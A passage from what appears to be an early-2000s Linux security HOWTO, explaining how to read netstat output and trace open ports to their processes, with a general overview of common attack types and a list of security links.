responding to UDP connections. UDP is a different protocol from TCP
altogether, but is used for some types of low priority network traffic.

Now, the same thing with the "-n" flag to suppress converting to "names" so
we can actually see the port numbers:

+-----------------------------------------------------------------------------+
|$ netstat -taun                                                              |
|Active Internet connections (servers and established)                        |
|Proto Recv-Q Send-Q Local Address           Foreign Address      State       |
|tcp        0      0 0.0.0.0:515             0.0.0.0:*            LISTEN      |
|tcp        0      0 127.0.0.1:8000          0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:37              0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:6000            0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:80              0.0.0.0:*            LISTEN      |
|tcp        0      0 192.168.1.1:53          0.0.0.0:*            LISTEN      |
|tcp        0      0 127.0.0.1:53            0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:22              0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:631             0.0.0.0:*            LISTEN      |
|tcp        0      0 0.0.0.0:25              0.0.0.0:*            LISTEN      |
|tcp        0      1 169.254.179.139:1174    64.152.100.93:119    SYN_SENT    |
|tcp        0      1 169.254.179.139:1175    64.152.100.93:119    SYN_SENT    |
|tcp        0      1 169.254.179.139:1173    64.152.100.93:119    SYN_SENT    |
|tcp        0      0 169.254.179.139:1172    207.153.203.114:80   ESTABLISHED |
|tcp        1      0 169.254.179.139:1199    216.26.129.136:80    CLOSE_WAIT  |
|tcp        0      0 169.254.179.139:80      63.236.92.144:34197  TIME_WAIT   |
|tcp      400      0 127.0.0.1:1152          127.0.0.1:8000       CLOSE_WAIT  |
|tcp     6648      0 127.0.0.1:1162          127.0.0.1:8000       CLOSE_WAIT  |
|tcp      553      0 127.0.0.1:1164          127.0.0.1:8000       CLOSE_WAIT  |
|udp        0      0 0.0.0.0:32768           0.0.0.0:*                        |
|udp        0      0 192.168.1.1:53          0.0.0.0:*                        |
|udp        0      0 127.0.0.1:53            0.0.0.0:*                        |
|udp        0      0 0.0.0.0:631             0.0.0.0:*                        |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Let's look at the first few lines of this in detail. On line one,

+----------------------------------------------------------------------------+
| tcp        0      0 0.0.0.0:515            0.0.0.0:*          LISTEN       |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

"Local Address" is 0.0.0.0, meaning "all" interfaces that are available. The
local port is 515, or the standard print server port, usually owned by the
lpd daemon. You can find a listing of common service names and corresponding
ports in the file /etc/services.

The fact that it is listening on all interfaces is significant. In this case,
that would be lo (localhost), eth0, and eth1. Printer connections could
conceivably be made over any of these interfaces. Should a user on this
system bring up a PPP connection, then the print daemon would be listening on
that interface (ppp0) as well. The "Foreign Address" is also 0.0.0.0, meaning
from "anywhere".

It is also worth noting here, that even though this server is telling the
kernel to listen on all interfaces, the netstat output does not reflect
whether there may be a firewall in place that may be filtering incoming
connections. We just can't tell that at this point. Obviously, for certain
servers, this is very desirable. Nobody outside your own LAN has any reason
whatsoever to connect to your print server port for instance.

Line two is a little different:

+----------------------------------------------------------------------------+
| tcp        0      0 127.0.0.1:8000         0.0.0.0:*          LISTEN       |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

Notice the "Local Address" this time is localhost's address of 127.0.0.1.
This is very significant as only connections local to this machine will be
accepted. So only bigcat can connect to bigcat's TCP port 8000. The security
implications should be obvious. Not all servers have configuration options
that allow this kind of restriction, but it is a very useful feature for
those that do. Port 8000 in this example, is owned by the web proxy
Junkbuster.

With the next three entries, we are back to listening on all available
interfaces:

+-----------------------------------------------------------------------------+
| tcp        0      0 0.0.0.0:37             0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:6000           0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:80             0.0.0.0:*           LISTEN       |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Looking at /etc/services, we can tell that port 37 is a "time" service, which
is a time server. 6000 is X11, and 80 is the standard port for HTTP servers
like Apache. There is nothing really unusual here as these are all readily
available services on Linux.

The first two above are definitely not the kind of services you'd want just
anyone to connect to. These should be firewalled so that all outside
connections are refused. Again, we can't tell from this output whether any
firewall is in place, much less how effectively implemented it may be.

The web server on port 80 is not a huge security risk by itself. HTTP is a
protocol that is often open to all comers. For instance, if we wanted to host
our own home page, Apache can certainly do this for us. It is also possible
to firewall this off, so that it is for use only to our LAN clients as part
of an Intranet. Obviously too, if you do not have a good justification for
running a web server, then it should be disabled completely.

The next two lines are interesting:

+-----------------------------------------------------------------------------+
| tcp        0      0 192.168.1.1:53         0.0.0.0:*           LISTEN       |
| tcp        0      0 127.0.0.1:53           0.0.0.0:*           LISTEN       |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Again notice the "Local Address" is not 0.0.0.0. This is good! The port this
time is 53, or the DNS port used by nameserver daemons like named. But we see
the nameserver daemon is only listening on the lo interface (localhost), and
the interface that connects bigcat to the LAN. So the kernel only allows
connections from localhost, and the LAN. There will be no port 53 available
to outside connections at all. This is a good example of how individual
applications can sometimes be securely configured. In this case, we are
probably looking at a caching DNS server since a real nameserver that is
responsible for handling DNS queries would have to have port 53 open to the
world. This is a security risk and requires special handling.

The last three LISTENER entries:

+-----------------------------------------------------------------------------+
| tcp        0      0 0.0.0.0:22             0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:631            0.0.0.0:*           LISTEN       |
| tcp        0      0 0.0.0.0:25             0.0.0.0:*           LISTEN       |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

These are back to listening on all available interfaces. Port 22 is sshd, the
Secure Shell server daemon. This is a good sign! Notice that the service for
port 631 does not have a service name if we look at the output in the first
example. This might be a clue that something unusual is going on here. (See
the next section for the answer to this riddle.) And lastly, port 25, the
standard port for the SMTP mail daemon. Most Linux installations probably
will have an SMTP daemon running, so this is not necessarily unusual. But is
it necessary?

The next grouping is established connections. For our purposes the state of
the connection as indicated by the last column is not so important. This is
well explained in the man page.

+-------------------------------------------------------------------------------+
| tcp        0      1 169.254.179.139:1174    64.152.100.93:119    SYN_SENT     |
| tcp        0      1 169.254.179.139:1175    64.152.100.93:119    SYN_SENT     |
| tcp        0      1 169.254.179.139:1173    64.152.100.93:119    SYN_SENT     |
| tcp        0      0 169.254.179.139:1172    207.153.203.114:80   ESTABLISHED  |
| tcp        1      0 169.254.179.139:1199    216.26.129.136:80    CLOSE_WAIT   |
| tcp        0      0 169.254.179.139:80      63.236.92.144:34197  TIME_WAIT    |
| tcp      400      0 127.0.0.1:1152          127.0.0.1:8000       CLOSE_WAIT   |
| tcp     6648      0 127.0.0.1:1162          127.0.0.1:8000       CLOSE_WAIT   |
| tcp      553      0 127.0.0.1:1164          127.0.0.1:8000       CLOSE_WAIT   |
|                                                                               |
|                                                                               |
+-------------------------------------------------------------------------------+

There are nine total connections here. The first three is our external
interface connecting to a remote host on their port 119, the standard NNTP
(News) port. There are three connections here to the same news server.
Apparently the application is multi-threaded, as it is trying to open
multiple connections to the news server. The next two entries are connections
to a remote web server as indicated by the port 80 after the colon in the
fifth column. Probably a pretty common looking entry for most of us. But the
one just after is reversed and has the port 80 in the fourth column, so this
is someone that has connected to bigcat's web server via its external,
Internet-side interface. The last three entries are all connections from
localhost to localhost. So we are connecting to ourselves here. Remembering
from above that port 8000 is bigcat's web proxy, this is a web browser that
is connected to the locally running proxy. The proxy then will open an
external connection of its own, which probably is what is going on with lines
four and five.

Since we gave netstat both the -t and -u options, we are getting both the TCP
and UDP listening servers. The last few lines are the UDP ones:

+----------------------------------------------------------------------------+
| udp        0      0 0.0.0.0:32768          0.0.0.0:*                       |
| udp        0      0 192.168.1.1:53         0.0.0.0:*                       |
| udp        0      0 127.0.0.1:53           0.0.0.0:*                       |
| udp        0      0 0.0.0.0:631            0.0.0.0:*                       |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

The last three entries have ports that are familiar from the above
discussion. These are servers that are listening for both TCP and UDP
connections. Same servers in this case, just using two different protocols.
The first one on local port 32768 is new, and does not have a service name
available to it in /etc/services. So at first glance this should be
suspicious and pique our curiosity. See the next section for the explanation.

Can we draw any conclusions from this hypothetical situation? For the most
part, these look to be pretty normal looking network services and connections
for Linux. There does not seem to be an unduly high number of servers running
here, but that by itself does not mean much since we don't know if all these
servers are really required or not. We know that netstat can not tell us if
any of these are effectively firewalled, so there is no way to say how secure
all this might be. We also don't really know if all the listening services
are really required by the owner here. That is something that varies widely
from installation to installation. Does bigcat even have a printer attached
for instance? Presumably it does, or this is a completely unnecessary risk.
-----------------------------------------------------------------------------

8.3.2. Port and Process Owners

We've learned a lot about what is going on with bigcat's networking from the
above section. But suppose we see something we don't recognize and want to
know what started that particular service? Or we want to stop a particular
server and it is not obvious from the above output?

The -p option should give us the process's PID and the program name that
started the process in the last column. Let's look at the TCP servers again
(with first three columns cropped for spacing). We'll have to run this as
root to get all the available information:

+----------------------------------------------------------------------------+
|# netstat -tap                                                              |
|Active Internet connections (servers and established)                       |
|  Local Address           Foreign Address      State       PID/Program name |
|  *:printer               *:*                  LISTEN       988/inetd       |
|  bigcat:8000             *:*                  LISTEN       1064/junkbuster |
|  *:time                  *:*                  LISTEN       988/inetd       |
|  *:x11                   *:*                  LISTEN       1462/X          |
|  *:http                  *:*                  LISTEN       1078/httpd      |
|  bigcat:domain           *:*                  LISTEN       956/named       |
|  bigcat:domain           *:*                  LISTEN       956/named       |
|  *:ssh                   *:*                  LISTEN       972/sshd        |
|  *:631                   *:*                  LISTEN       1315/cupsd      |
|  *:smtp                  *:*                  LISTEN       1051/master     |
|                                                                            |
|                                                                            |
+----------------------------------------------------------------------------+

Some of these we already know about. But we see now that the printer daemon
on port 515 is being started via inetd with a PID of "988". inetd is a
special situation. inetd is often called the "super server", since it's main
role is to spawn sub-services. xinetd replaces inetd as of Red Hat 7.0. If we
look at the first line, inetd is listening on port 515 for printer services.
If a connection comes for this port, inetd intercepts it, and then will spawn
the appropriate daemon, i.e. the print daemon in this case. The configuration
of how inetd handles this is typically done in /etc/inetd.conf. This should
tell us that if we want to stop an inetd controlled server on a permanent
basis, then we will have to dig into the inetd (or perhaps xinetd)
configuration. Also the time service above is started via inetd as well. This
should also tell us that these two services can be further protected by
tcpwrappers (discussed in Step 3 above). This is one benefit of using inetd
to control certain system services.

We weren't sure about the service on port 631 above since it did not have a
standard service name, which means it is something maybe unusual or off the
beaten path. Now we see it is owned by cupsd (not included with Red Hat by
the way), which is one of several print daemons available under Linux. This
happens to be the web interface for controlling the printer service.
Something cupsd does that is indeed a little different than other print
servers.

The last entry above is the SMTP mail server on bigcat. Often, this is
sendmail. But not in this case. The command is "master", which may not ring
any bells. Armed with the program name we could go searching the filesystem
with tools like the locate or find commands. After we found it, we could then
probably discern what package it belonged to. But with the PID available now,
we can look at ps output, and see if that helps us any:

+---------------------------------------------------------------------------+
| $ /bin/ps ax |grep 1051 |grep -v grep                                     |
|  1051 ?        S        0:24 /usr/libexec/postfix/master                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

We took a shortcut here by combining ps with grep. It looks like that this
file belongs to postfix, which is indeed a mail server package comparable to
sendmail ( and is included with Powertools, not the base distribution).

Running ps with the --forest flag (-f for short) can be helpful in
determining what processes are parent or child process or another process. An
edited example:

+---------------------------------------------------------------------------+
| $ /bin/ps -axf                                                            |
|  956 ?        S      0:00 named -u named                                  |
|  957 ?        S      0:00  \_ named -u named                              |
|  958 ?        S      0:46      \_ named -u named                          |
|  959 ?        S      0:47      \_ named -u named                          |
|  960 ?        S      0:00      \_ named -u named                          |
|  961 ?        S      0:11      \_ named -u named                          |
| 1051 ?        S      0:30 /usr/libexec/postfix/master                     |
| 1703 ?        S      0:00  \_ tlsmgr -l -t fifo -u -c                     |
| 1704 ?        S      0:00  \_ qmgr -l -t fifo -u -c                       |
| 1955 ?        S      0:00  \_ pickup -l -t fifo -c                        |
| 1863 ?        S      0:00  \_ trivial-rewrite -n rewrite -t unix -u -c    |
| 2043 ?        S      0:00  \_ cleanup -t unix -u -c                       |
| 2049 ?        S      0:00  \_ local -t unix                               |
| 2062 ?        S      0:00  \_ smtpd -n smtp -t inet -u -c                 |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

A couple of things to note here. We have two by now familiar daemons here:
named and postfix (smtpd). Both are spawning sub-processes. In the case of
named, what we are seeing is threads, various sub-processes that it always
spawns. Postfix is also spawning sub-processes, but not as "threads". Each
sub-process has its own specific task. It is worth noting that child
processes are dependent on the parent process. So killing the parent PID,
will in turn kill all child processes.

If all this has not shed any light, we might also try locate:

+---------------------------------------------------------------------------+
| $ locate /master                                                          |
| /etc/postfix/master.cf                                                    |
| /var/spool/postfix/pid/master.pid                                         |
| /usr/libexec/postfix/master                                               |
| /usr/share/vim/syntax/master.vim                                          |
| /usr/share/vim/vim60z/syntax/master.vim                                   |
| /usr/share/doc/postfix-20010202/html/master.8.html                        |
| /usr/share/doc/postfix-20010202/master.cf                                 |
| /usr/share/man/man8/master.8.gz                                           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

find is perhaps the most flexible file finding utility, but doesn't use a
database the way locate does, so is much slower:

+---------------------------------------------------------------------------+
| $ find / -name master                                                     |
| /usr/libexec/postfix/master                                               |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

If lsof is installed, it is another command that is useful for finding who
owns processes or ports:

+---------------------------------------------------------------------------+
| # lsof -i :631                                                            |
| COMMAND  PID  USER    FD   TYPE DEVICE SIZE NODE NAME                     |
| cupsd   1315  root    0u   IPv4   3734       TCP *:631 (LISTEN)           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

This is again telling us that the cupsd print daemon is the owner of port
631. Just a different way of getting at it. Yet one more way to get at this
is with fuser, which should be installed:

+---------------------------------------------------------------------------+
| # fuser -v -n tcp 631                                                     |
|                                                                           |
|                      USER        PID  ACCESS  COMMAND                     |
| 631/tcp              root       1315  f....   cupsd                       |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

See the man pages for fuser and lsof command syntax.

Another place to look for where a service is started, is in the init.d
directory, where the actual init scripts live. Something like ls -l /etc/rc.d
/init.d/, should give us a list of these. Often the script name itself gives
a hint as to which service(s) it starts, though it may not necessarily
exactly match the "Program Name" as provided by netstat. Or we can use grep
to search inside files and match a search pattern. Need to find where
rpc.statd is being started, and we don't see a script by this name?

+---------------------------------------------------------------------------+
| # grep rpc.statd /etc/init.d/*                                            |
| /etc/init.d/nfslock: [ -x /sbin/rpc.statd ] || exit 0                     |
| /etc/init.d/nfslock:    daemon rpc.statd                                  |
| /etc/init.d/nfslock:    killproc rpc.statd                                |
| /etc/init.d/nfslock:    status rpc.statd                                  |
| /etc/init.d/nfslock:    /sbin/pidof rpc.statd >/dev/null 2>&1; STATD="$?" |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

We didn't really need all that information, but at least we see now exactly
which script is starting it. Remember too that not all services are started
this way. Some may be started via inetd, or xinetd.

The /proc filesystem also keeps everything we want to know about processes
that are running. We can query this to find out more information about each
process. Do you need to know the full path of the command that started a
process?

+-----------------------------------------------------------------------------+
| # ls -l /proc/1315/exe                                                      |
| lrwxrwxrwx  1 root  root   0 July 4 19:41 /proc/1315/exe -> /usr/sbin/cupsd |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Finally, we had a loose end or two in the UDP listening services. Remember we
had a strange looking port number 32768, that also had no service name
associated with it:

+------------------------------------------------------------------------------------+
| # netstat -aup                                                                     |
| Active Internet connections (servers and established)                              |
|  Local Address           Foreign Address         State       PID/Program name      |
|   *:32768                 *:*                                 956/named            |
|   bigcat:domain           *:*                                 956/named            |
|   bigcat:domain           *:*                                 956/named            |
|   *:631                   *:*                                 1315/cupsd           |
|                                                                                    |
|                                                                                    |
+------------------------------------------------------------------------------------+

Now by including the "PID/Program name" option with the -p flag, we see this
also belongs to named, the nameserver daemon. Recent versions of BIND use an
unprivileged port for some types of traffic. In this case, this is BIND 9.x.
So no real alarms here either. The unprivileged port here is the one named
uses to to talk to other nameservers for name and address lookups, and should
not be firewalled.

So we found no big surprises in this hypothetical situation.

If all else fails, and you can't find a process owner for an open port,
suspect that it may be an RPC (Remote Procedure Call) service of some kind.
These use randomly assigned ports without any seeming logic or consistency,
and are typically controlled by the portmap daemon. In some cases, these may
not reveal the process owner to netstat or lsof. Try stopping portmap, and
then see if the mystery service goes away. Or you can use rpcinfo -p
localhost to see what RPC services may be running (portmap must be running
for this to work).

Warning If you suspect you have been broken into, do not trust netstat or ps
        output. There is a good chance that they, and other system
        components, has been tampered with in such a way that the output is
        not reliable.
-----------------------------------------------------------------------------

8.4. Attacks and Threats

In this section, we will take a quick look at some of the common threats and
techniques that are out there, and attempt to put them into some perspective.

The corporate world, government agencies and high profile Internet sites have
to be concerned with a much more diverse and challenging set of threats than
the typical home desktop user. There are many reasons someone may want to
break in to someone else's computer. It may be just for kicks, or any number
of malicious reasons. They may just want a base from which to attack someone
else. This is a very common motivation.

The most common "attack" for most of us is from already compromised systems.
The Internet is littered with computers that have been broken into, and are
now doing their master's bidding blindly, in zombie-like fashion. They are
programmed to scan massively large address ranges, probing each individual IP
address as they go. Looking for one or more open ports, and then probing for
known weaknesses if they get the chance. Very impersonal. Very methodical.
And very effective. We are all in the path of such robotic scans. All because
those responsible for these systems fail to do what you are doing now -
taking steps to protect their system(s), and avoid being r00ted.

These scans do not look at login banners that may be presented on connection.
It will do little good to change your /etc/issue.net to pretend that you are
running some obscure operating system. If they find something listening, they
will try all of the exploits appropriate to that port, without regard to any
indications your system may give. If it works, they are in -- if not, they
will move on.
-----------------------------------------------------------------------------

8.4.1. Port Scans and Probes

First, let's define "scan" and "probe" since these terms come up quite a bit.
A "probe" implies testing if a given port is open or closed, and possibly
what might be listening on that port. A "scan" implies either "probing"
multiple ports on one or more systems. Or individual ports on multiple
systems. So you might "scan" all ports on your own system for instance. Or a
cracker might "scan" the 216.78.*.* address range to see who has port 111
open.

Black hats can use scan and probe information to know what services are
running on a given system, and then they might know what exploits to try.
They may even be able to tell what Operating System is running, and even
kernel version, and thus get even more information. "Worms", on the other
hand, are automated and scan blindly, generally just looking for open ports,
and then a susceptible victim. They are not trying to "learn" anything, the
way a cracker might.

The distinction between "scan" and "probe"is often blurred. Both can used in
good ways, or in bad ways, depending on who is doing it, and why. You might
ask a friend to scan you, for instance, to see how well your firewall is
working. This is a legitimate use of scanning tools such as nmap. But what if
someone you don't know does this? What is their intent? If it's your ISP,
they may be trying to enforce their Terms of Service Agreement. Or maybe, it
is someone just playing, and seeing who is "out there". But more than likely
it is someone or something with not such good intentions.

Full range port scans (meaning probing of many ports on the same machine)
seem to be a not so common threat for home based networks. But certainly,
scanning individual ports across numerous systems is a very, very common
occurrence.
-----------------------------------------------------------------------------

8.4.2. Rootkits

A "rootkit" is the script kiddie's stock in trade. When a successful
intrusion takes place, the first thing that is often done, is to download and
install such "rootkits". The rootkit is a set of scripts designed to take
control of the system, and then hide the intrusion. Rootkits are readily
available on the web for various Operating Systems.

A rootkit will typically replace critical system files such as ls, ps,
netstat, login and others. Passwords may be added, hidden daemons started,
logs tampered with, and surely one of more backdoors are opened. The hidden
backdoors allow easy access any time the attacker wants back in. And often
the vulnerability itself may even be fixed so that the new "owner" has the
system all to himself. The entire process is scripted so it happens very
quickly. The rightful owners of these compromised systems generally have no
idea what is going on, and are victims themselves. A well designed rootkit
can be very difficult to detect.
-----------------------------------------------------------------------------

8.4.3. Worms and Zombies

A "worm" is a self replicating exploit. It infects a system, then attempts to
spread itself typically via the same vulnerability. Various "worms" are
weaving their way through the entire Internet address space constantly,
spreading themselves as they go.

But somewhere behind the zombie, there is a controller. Someone launched the
worm, and they will be informed after a successful intrusion. It is then up
to them how the system will be used.

Many of these are Linux systems, looking for other Linux systems to "infect"
via a number of exploits. But most Operating Systems share in this threat.
Once a vulnerable system is found, the actual entry and take over is quick,
and may be difficult to detect after the fact. The first thing an intruder
(whether human or "worm") will do is attempt to cover their tracks. A
"rootkit" is downloaded and installed. This trend has been exacerbated by the
growing popularity of cable modems and DSL. The number of full time Internet
connections is growing rapidly, and this makes fertile ground for such
exploits since often these aren't as well secured as larger sites.

While this may sound ominous, a few simple precautions can effectively deter
this type of attack. With so many easy victims out there, why waste much
effort breaking into your system? There is no incentive to really try very
hard. Just scan, look, try, move on if unsuccessful. There is always more IPs
to be scanned. If your firewall is effectively bouncing this kind of thing,
it is no threat to you at all. Take comfort in that, and don't over re-act.

It is worth noting, that these worms cannot "force" their way in. They need
an open and accessible port, and a known vulnerability. If you remember the
"Iptables Weekly Log Summary" in the opening section above, many of those may
have all been the result of this type of scan. If you've followed the steps
in this HOWTO, you should be reasonably safe here. This one is easy enough to
deflect.
-----------------------------------------------------------------------------

8.4.4. Script Kiddies

A "script kiddie" is a "cracker" wanna be who doesn't know enough to come up
with his/her own exploits, but instead relies on "scripts" and exploits that
have been developed by others. Like "worms", they are looking for easy
victims, and may similarly scan large address ranges looking for specific
ports with known vulnerabilities. Often, the actual scanning is done from
already comprised systems so that it is difficult to trace it back to them.

The script kiddie has a bag of ready made tricks at his disposal, including
an arsenal of "rootkits" for various Operating Systems. Finding susceptible
victims is not so hard, given enough time and address space to probe. The
motives are a mixed bag as well. Simple mischief, defacement of web sites,
stolen credit card numbers, and the latest craze, "Denial of Service" attacks
(see below). They collect zombies like trophies and use them to carry out
whatever their objective is.

Again, the key here is that they are following a "script", and looking for
easy prey. Like the worm threat above, a functional firewall and a few very
basic precautions, should be sufficient to deflect any threat here. By now,
you should be relatively safe from this nuisance.
-----------------------------------------------------------------------------

8.4.5. Spoofed IPs

How easy is it to spoof an IP address? With the right tools, very easy. How
much of a threat is this? Not much, for most of us, and is over-hyped as a
threat.

Because of the way TCP/IP works, each packet must carry both the source and
destination IP addresses. Any return traffic is based on this information. So
a spoofed IP can never return any useful information to an attacker who is
sending out spoofed packets. The traffic would go back to wherever that
spoofed IP address was pointed. The attacker gets nothing back at all.

This does have potential for "DoS" attacks (see below) where learning
something about the targeted system is not important. And may be used for
some general mischief making as well.
-----------------------------------------------------------------------------

8.4.6. Targeted Attacks

The worm and wide ranging address type scans, are impersonal. They are just
looking for any vulnerable system. It makes no difference whether it is a top
secret government facility, or your mother's Window's box. But there are
"black hats" that will spend a great deal of effort to get into a system or
network. We'll call these "targeted" attacks since there has been a
deliberate decision made to break in to a specific system or network.

In this case, the attacker will look the system over for weaknesses. And
possibly make many different kinds of attempts, until he finds a crack to
wiggle through. Or gives up. This is more difficult to defend against. The
attacker is armed and dangerous, so to speak, and is stalking his prey.

Again, this scenario is very unlikely for a typical home system. There just
generally isn't any incentive to take the time and effort when there are
bigger fish to fry. For those who may be targets, the best defense here
includes many of things we've discussed. Vigilance is probably more important
than ever. Good logging practices and an IDS (Intrusion Detection System)
should be in place. And subscribing to one or more security related mailing
lists like BUGTRAQ. And of course, reading those alerts daily, and taking the
appropriate actions, etc.
-----------------------------------------------------------------------------

8.4.7. Denial of Service (DoS)

"DoS" is another type of "attack" in which the intention is to disrupt or
overwhelm the targeted system or network in such a way that it cannot
function normally. DoS can take many forms. On the Internet, this often means
overwhelming the victim's bandwidth or TCP/IP stack, by sending floods of
packets and thus effectively disabling the connection. We are talking about
many, many packets per second. Thousands in some cases. Or perhaps, the
objective is to crash a server.

This is much more likely to be targeted at organizations or high profile
sites, than home users. And can be quite challenging to stop depending on the
technique. And it generally requires the co-operation of networks between the
source(s) and the target, so that the floods are stopped, or minimized,
before they reach the targeted destination. Once they hit the destination,
there is no good way to completely ignore them.

"DDoS", Distributed Denial of Service, is where multiple sources are used to
maximize the impact. Again, not likely to be directly targeted at home users.
These are "slaves" that are "owned" by a cracker, or script kiddie, that are
woken up and are targeted at the victim. There may be many computers involved
in the attack.

If you are home user, and with a dynamic IP address, you might find
disconnecting, then re-connecting to get a new IP, an effective way out if
you are the target. Maybe.
-----------------------------------------------------------------------------

8.4.8. Brute Force

"Brute force" attacks are where the attacker makes repetitive attempts at the
same perceived weakness(es). Like a battering ram. A classic example would be
where someone tries to access a telnet server simply by continually throwing
passwords at it, hoping that one will eventually work. Or maybe crash the
server. This doesn't require much imagination, and is not a commonly used
tactic against home systems.

By the way, this is one good argument against allowing remote root logins.
The root account exists on all systems. It is probably the only one that this
is true of. You'd like to make a potential attacker guess both the login name
and password. But if root is allowed remote logins, then the attacker only
needs to guess the password!
-----------------------------------------------------------------------------

8.4.9. Viruses

And now something not to worry about. Viruses seem to be primarily a
Microsoft problem. For various reasons, viruses are not a significant threat
to Linux users. This is not to say that it will always be this way, but the
current virus explosion that plagues Microsoft systems, can not spread to
Linux (or Unix) based systems. In fact, the various methods and practices
that enable this phenomena, are not exploitable on Linux. So Anti-Virus
software is not recommended as part of our arsenal. At least for the time
being with Linux only networks.
-----------------------------------------------------------------------------

8.5. Links

Some references for further reading are listed below. Not listed is your
distribution's site, security page or ftp download site. You will have to
find these on your own. Then you should bookmark them!

<A0><A0>*<2A>Redhat sites of interest:

    The Redhat watch/security mailing list: [https://listman.redhat.com/
    mailman/listinfo/redhat-watch-list] https://listman.redhat.com/mailman/
    listinfo/redhat-watch-list

    Red Hat errata and security notices: [http://redhat.com/errata/] http://
    redhat.com/errata/

    The Red Hat update FTP site: [ftp://updates.redhat.com/] ftp://
    updates.redhat.com/


<A0><A0>*<2A>Other relevant documents available from the Linux Documentation Project:

    Security HOWTO: [http://tldp.org/HOWTO/Security-HOWTO.html ] http://
    tldp.org/HOWTO/Security-HOWTO.html

    Firewall HOWTO: [http://tldp.org/HOWTO/Firewall-HOWTO.html] http://
    tldp.org/HOWTO/Firewall-HOWTO.html

    Ipchains HOWTO: [http://tldp.org/HOWTO/IPCHAINS-HOWTO.html ] http://
    tldp.org/HOWTO/IPCHAINS-HOWTO.html

    User Authentication: [http://tldp.org/HOWTO/User-Authentication-HOWTO/
    index.html] http://tldp.org/HOWTO/User-Authentication-HOWTO/index.html,
    includes a nice discussion on PAM.

    VPN (Virtual Private Network): [http://tldp.org/HOWTO/VPN-HOWTO.html]
    http://tldp.org/HOWTO/VPN-HOWTO.html and [http://tldp.org/HOWTO/
    VPN-Masquerade-HOWTO.html] http://tldp.org/HOWTO/
    VPN-Masquerade-HOWTO.html

    The Remote X Apps Mini HOWTO, [http://www.tldp.org/HOWTO/mini/
    Remote-X-Apps.html] http://www.tldp.org/HOWTO/mini/Remote-X-Apps.html,
    includes excellent discussions on the security implications of running X
    Windows.

    The Linux Network Administrators Guide: [http://tldp.org/LDP/nag2/
    index.html] http://tldp.org/LDP/nag2/index.html, includes a good overview
    of networking and TCP/IP, and firewalling.

    The Linux Administrator's Security Guide: [http://www.seifried.org/lasg/]
    http://www.seifried.org/lasg/, includes many obvious topics of interest,
    including firewalling, passwords and authentication, PAM, and more.

    Securing Red Hat: [http://tldp.org/LDP/solrhe/
    Securing-Optimizing-Linux-RH-Edition-v1.3/index.html] http://tldp.org/LDP
    /solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/index.html


<A0><A0>*<2A>Tools for creating custom ipchains and iptables firewall scripts:

    Firestarter: [http://firestarter.sourceforge.net] http://
    firestarter.sourceforge.net

    Two related projects: [http://seawall.sourceforge.net/] http://
    seawall.sourceforge.net/ for ipchains, and [http://
    shorewall.sourceforge.net/] http://shorewall.sourceforge.net/ for
    iptables.


<A0><A0>*<2A>Netfilter and iptables documentation from the netfilter developers
    (available in many other languages as well):

    FAQ: [http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html]
    http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html
    Packet filtering: [http://netfilter.samba.org/documentation/HOWTO/
    packet-filtering-HOWTO.html] http://netfilter.samba.org/documentation/
    HOWTO/packet-filtering-HOWTO.html
    Networking: [http://netfilter.samba.org/documentation/HOWTO/
    networking-concepts-HOWTO.html] http://netfilter.samba.org/documentation/
    HOWTO/networking-concepts-HOWTO.html
    NAT/masquerading: [http://netfilter.samba.org/documentation/HOWTO/
    NAT-HOWTO.html] http://netfilter.samba.org/documentation/HOWTO/
    NAT-HOWTO.html


<A0><A0>*<2A>Port number assignments, and what that scanner may be scanning for:

    [http://www.linuxsecurity.com/resource_files/firewalls/
    firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls
    /firewall-seen.html

    [http://www.sans.org/newlook/resources/IDFAQ/oddports.htm] http://
    www.sans.org/newlook/resources/IDFAQ/oddports.htm

    [http://www.iana.org/assignments/port-numbers] http://www.iana.org/
    assignments/port-numbers, the official assignments.


<A0><A0>*<2A>General security sites. These all have areas on documentation, alerts,
    newsletters, mailing lists, and other resources.

    Linux Security.com: [http://www.linuxsecurity.com] http://
    www.linuxsecurity.com, loaded with good info, and Linux specific. Lots of
    good docs: [http://www.linuxsecurity.com/docs/] http://
    www.linuxsecurity.com/docs/

    CERT, [http://www.cert.org] http://www.cert.org

    The SANS Institute: [http://www.sans.org/] http://www.sans.org/

    The Coroner's Toolkit (TCT): [http://www.fish.com/security/] http://
    www.fish.com/security/, discussions and tools for dealing with post
    break-in issues (and preventing them in the first place).


<A0><A0>*<2A>Privacy:

    Junkbuster: [http://www.junkbuster.com] http://www.junkbuster.com, a web
    proxy and cookie manager.

    PGP: [http://www.gnupg.org/] http://www.gnupg.org/


<A0><A0>*<2A>Other documentation and reference sites:

    Linux Security.com: [http://www.linuxsecurity.com/docs/] http://
    www.linuxsecurity.com/docs/

    Linux Newbie: [http://www.linuxnewbie.org/nhf/intel/security/index.html]
    http://www.linuxnewbie.org/nhf/intel/security/index.html

    The comp.os.linux.security FAQ: [http://www.linuxsecurity.com/docs/
    colsfaq.html] http://www.linuxsecurity.com/docs/colsfaq.html

